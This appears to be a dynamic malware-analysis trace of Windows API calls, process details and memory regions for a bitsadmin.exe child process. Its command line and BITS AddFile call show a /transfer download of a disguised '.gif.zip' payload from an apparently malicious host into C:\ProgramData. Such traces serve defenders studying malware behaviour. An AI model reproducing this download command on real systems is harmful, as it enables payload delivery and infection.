[0072.784] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0072.784] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d4 | out: lpConsoleScreenBufferInfo=0x6e2d4) returned 1
[0072.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2ec, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2ec*=0x8) returned 1
[0072.785] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.785] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2f8 | out: _Buffer="385024") returned 6
[0072.785] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2fc | out: _Buffer="385024") returned 6
[0072.785] _vsnwprintf (in: _Buffer=0xe703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2f8 | out: _Buffer="100") returned 3
[0072.785] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2f4 | out: lpConsoleScreenBufferInfo=0x6e2f4) returned 1
[0072.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x6e30c, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e30c*=0x16) returned 1
[0072.785] CoTaskMemFree (pv=0x2183c0)
[0072.785] IBackgroundCopyJob:Complete (This=0x20a624) returned 0x0
[0072.825] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2f8 | out: lpConsoleScreenBufferInfo=0x6e2f8) returned 1
[0072.825] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0072.825] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6e2e4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e4*=0x2) returned 1
[0072.826] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0072.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xe643c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6e2e4, lpReserved=0x0 | out: lpBuffer=0xe643c4*, lpNumberOfCharsWritten=0x6e2e4*=0x14) returned 1
[0072.826] GetCurrentThreadId () returned 0xcd8
[0072.826] PostThreadMessageW (idThread=0xcd8, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0072.827] PeekMessageW (in: lpMsg=0x6fcf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fcf8) returned 1
[0072.827] IUnknown:Release (This=0x20a624) returned 0x1
[0072.827] IUnknown:Release (This=0x20a54c) returned 0x0
[0072.828] CoUninitialize ()
[0072.830] IUnknown:Release (This=0x220cb0) returned 0x2
[0072.830] IUnknown:Release (This=0x220cb0) returned 0x1
[0072.830] IUnknown:Release (This=0x220cb0) returned 0x0
[0072.830] IUnknown:Release (This=0x20a624) returned 0x0
[0072.830] CoTaskMemFree (pv=0x220cb0)
[0072.833] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0072.833] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0072.833] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0072.834] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0072.834] CloseHandle (hObject=0x80) returned 1
[0072.834] exit (_Code=0)
Thread:
id = 163
os_tid = 0xcec
Thread:
id = 164
os_tid = 0xcf0
Thread:
id = 165
os_tid = 0xcf4
Thread:
id = 166
os_tid = 0xcf8
Process:
id = "16"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be3a0"
os_pid = "0xd18"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\\ProgramData\\tempa\\marxvxinhhmxa.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1698
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1699
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1700
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1701
start_va = 0x1d0000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1702
start_va = 0x9e0000
end_va = 0xa23fff
entry_point = 0x9e0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1703
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1704
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1705
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1706
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 1707
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1708
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1709
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1710
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1711
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1712
start_va = 0x360000
end_va = 0x45ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 1713
start_va = 0x640000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1714
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1715
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1716
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1717
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1718
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1719
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1720
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1721
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1722
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1723
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1724
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1725
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1726
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1727
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1728
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1729
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1730
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1731
start_va = 0x190000
end_va = 0x196fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1732
start_va = 0x1a0000
end_va = 0x1a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1733
start_va = 0x1b0000
end_va = 0x1b0fff
entry_point = 0x1b0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1734
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1735
start_va = 0x210000
end_va = 0x310fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 1736
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1737
start_va = 0xa30000
end_va = 0x162ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a30000"
filename = ""
Region:
id = 1738
start_va = 0x460000
end_va = 0x4bbfff
entry_point = 0x460000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1739
start_va = 0x460000
end_va = 0x4bbfff
entry_point = 0x460000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1740
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1741
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1742
start_va = 0x460000
end_va = 0x4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 1743
start_va = 0x500000
end_va = 0x5defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 1744
start_va = 0x330000
end_va = 0x330fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 1745
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1746
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1747
start_va = 0x340000
end_va = 0x340fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 1748
start_va = 0x730000
end_va = 0x76ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 1749
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1750
start_va = 0x800000
end_va = 0x83ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 1751
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1752
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1753
start_va = 0x460000
end_va = 0x49bfff
entry_point = 0x460000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1754
start_va = 0x4c0000
end_va = 0x4fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 1755
start_va = 0x460000
end_va = 0x49bfff
entry_point = 0x460000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1756
start_va = 0x460000
end_va = 0x49bfff
entry_point = 0x460000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1757
start_va = 0x460000
end_va = 0x49bfff
entry_point = 0x460000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1758
start_va = 0x460000
end_va = 0x49bfff
entry_point = 0x460000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1759
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1760
start_va = 0x1630000
end_va = 0x18fefff
entry_point = 0x1630000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1761
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1762
start_va = 0x460000
end_va = 0x49ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 1763
start_va = 0x790000
end_va = 0x7cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 1764
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1765
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1766
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 168
os_tid = 0xd1c
[0072.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9ec | out: lpSystemTimeAsFileTime=0x20f9ec*(dwLowDateTime=0xdc196070, dwHighDateTime=0x1d469c7))
[0072.958] GetCurrentProcessId () returned 0xd18
[0072.958] GetCurrentThreadId () returned 0xd1c
[0072.958] GetTickCount () returned 0x20270
[0072.958] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9e4 | out: lpPerformanceCount=0x20f9e4*=1814690400000) returned 1
[0072.959] GetModuleHandleA (lpModuleName=0x0) returned 0x9e0000
[0072.959] __set_app_type (_Type=0x1)
[0072.959] __p__fmode () returned 0x757a31f4
[0072.959] __p__commode () returned 0x757a31fc
[0072.959] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa07f33) returned 0x0
[0072.959] __wgetmainargs (in: _Argc=0xa20824, _Argv=0xa2082c, _Env=0xa20828, _DoWildCard=0, _StartInfo=0xa20838 | out: _Argc=0xa20824, _Argv=0xa2082c, _Env=0xa20828) returned 0
[0072.960] _onexit (_Func=0xa0925e) returned 0xa0925e
[0072.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0072.960] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0072.961] AitLogFeatureUsageByApp () returned 0x0
[0072.961] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0072.961] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0072.961] VerifyVersionInfoW (in: lpVersionInformation=0x20f860, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x20f860) returned 1
[0072.961] SetLastError (dwErrCode=0x0)
[0072.961] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0072.961] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0072.961] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0072.961] GetCurrentProcess () returned 0xffffffff
[0072.961] GetCurrentThread () returned 0xfffffffe
[0072.961] GetCurrentProcess () returned 0xffffffff
[0072.962] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xa0c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xa0c3b0*=0x80) returned 1
[0072.962] SetConsoleCtrlHandler (HandlerRoutine=0x9f74cb, Add=1) returned 1
[0072.962] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0072.962] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0072.962] SetThreadUILanguage (LangId=0x0) returned 0x409
[0072.962] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0072.963] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0072.963] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0072.964] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0072.964] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0072.964] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0072.964] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0072.964] swprintf_s (in: _Dst=0x20f958, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0072.964] GetFileType (hFile=0x7) returned 0x2
[0072.964] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f8cc | out: lpMode=0x20f8cc) returned 1
[0072.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f8fc, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f8fc*=0x2) returned 1
[0072.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x20f908, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f908*=0x24) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20f90c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f90c*=0x1e) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x20f910, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f910*=0x29) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f914, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f914*=0x2) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x20f918, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f918*=0x5e) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x20f91c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f91c*=0x58) returned 1
[0072.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f920, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20f920*=0x2) returned 1
[0072.966] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0072.978] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0072.978] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x20f96c | out: lpNumberOfEvents=0x20f96c) returned 1
[0072.978] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0072.979] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xa0c3a8 | out: lpMode=0xa0c3a8) returned 1
[0072.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xa0c390 | out: lpConsoleScreenBufferInfo=0xa0c390) returned 1
[0072.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xa0c38c | out: lpMode=0xa0c38c) returned 1
[0072.979] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0072.979] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0072.979] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0072.979] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0072.979] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0072.979] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0072.979] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0072.979] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0072.980] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0072.980] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0072.980] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0072.980] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0072.980] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0072.980] CoCreateInstance (in: rclsid=0x9f65d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x9f65b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xa0c3b4 | out: ppv=0xa0c3b4*=0x37a54c) returned 0x0
[0073.018] IBackgroundCopyManager:CreateJob (in: This=0x37a54c, DisplayName="msd5", Type=0x0, pJobId=0x20f934, ppJob=0x20f930 | out: pJobId=0x20f934*(Data1=0xeea305f6, Data2=0x277d, Data3=0x42e2, Data4=([0]=0xb7, [1]=0xe4, [2]=0x89, [3]=0x58, [4]=0xec, [5]=0xc, [6]=0xe9, [7]=0xc)), ppJob=0x20f930*=0x37a624) returned 0x0
[0073.027] CoTaskMemAlloc (cb=0x50) returned 0x390cb0
[0073.027] IUnknown:AddRef (This=0x37a624) returned 0x2
[0073.027] IUnknown:AddRef (This=0x37a624) returned 0x3
[0073.027] PeekMessageW (in: lpMsg=0x20f8ac, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x20f8ac) returned 0
[0073.027] IUnknown:Release (This=0x37a624) returned 0x2
[0073.027] IBackgroundCopyJob:SetPriority (This=0x37a624, Val=0x0) returned 0x0
[0073.030] IBackgroundCopyJob:AddFile (This=0x37a624, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmxa.gif") returned 0x0
[0073.037] IBackgroundCopyJob:SetNotifyFlags (This=0x37a624, Val=0xb) returned 0x0
[0073.040] IBackgroundCopyJob:SetNotifyInterface (This=0x37a624, Val=0x390cb0) returned 0x0
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f3b0 | out: ppvObject=0x20f3b0*=0x0) returned 0x80004002
[0073.040] IUnknown:QueryInterface (in: This=0x390cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f370 | out: ppvObject=0x20f370*=0x0) returned 0x80004002
